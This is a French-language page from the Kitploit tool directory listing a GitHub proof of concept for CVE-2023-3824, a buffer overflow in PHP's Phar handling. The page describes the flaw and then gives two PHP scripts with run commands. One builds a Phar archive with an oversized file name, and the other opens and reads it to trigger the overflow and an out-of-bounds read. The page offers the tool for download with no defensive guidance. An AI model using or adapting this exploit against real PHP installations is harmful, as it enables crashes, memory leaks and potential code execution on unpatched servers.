Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-3824 — Vulnérabilité dans les fichiers PHP Phar, due à un débordement de tampon, provient de contrôles de longueur insuffisants sur les noms de fichiers au sein de l'archive Phar. Des acteurs malveillants peuvent créer des fichiers Phar avec de longs noms de fichiers, entraînant un débordement de tampon et une exécution potentielle de code malveillant ou une fuite de données. Cette vulnérabilité peut être exploitée pour l'exécution de code CVE-2023-3824 | Kitploit
Outils/GitHubGitHub/jhonnybonny/cve-2023-3824
Génération de PayloadsAnalyse des VulnérabilitésExploitationApprentissage et ÉducationExploitation de Binaires
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

Voir le dépôt
3246il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Vulnérabilité dans les fichiers PHP Phar, due à un débordement de tampon, provient de contrôles de longueur insuffisants sur les noms de fichiers au sein de l'archive Phar. Des acteurs malveillants peuvent créer des fichiers Phar avec de longs noms de fichiers, entraînant un débordement de tampon et une exécution potentielle de code malveillant ou une fuite de données. Cette vulnérabilité peut être exploitée pour l'exécution de code CVE-2023-3824

Partager

PoC d'un fichier Phar malveillant en PHP (CVE-2023-3824)

Description

Cette preuve de concept (PoC) démontre comment créer un fichier Phar malveillant en PHP et déclencher une vulnérabilité de débordement de tampon.

Utilisation

Création du fichier Phar malveillant

  1. Créez un nouveau fichier PHP (par exemple, create_phar.php) et ajoutez le code suivant :
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

Exécutez le script PHP pour créer le fichier Phar malveillant :

Copier le code

root@kitploit:~
php create_phar.php

Déclenchement du débordement de tampon

Créez un autre fichier PHP (par exemple, trigger_overflow.php) et ajoutez le code suivant :

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

Exécutez le script PHP pour déclencher le débordement de tampon :

Copier le code

root@kitploit:~
php trigger_overflow.php

L'instruction var_dump($x) affichera le résultat de l'opération de débordement de tampon et de lecture hors limites.

Télécharger l’outil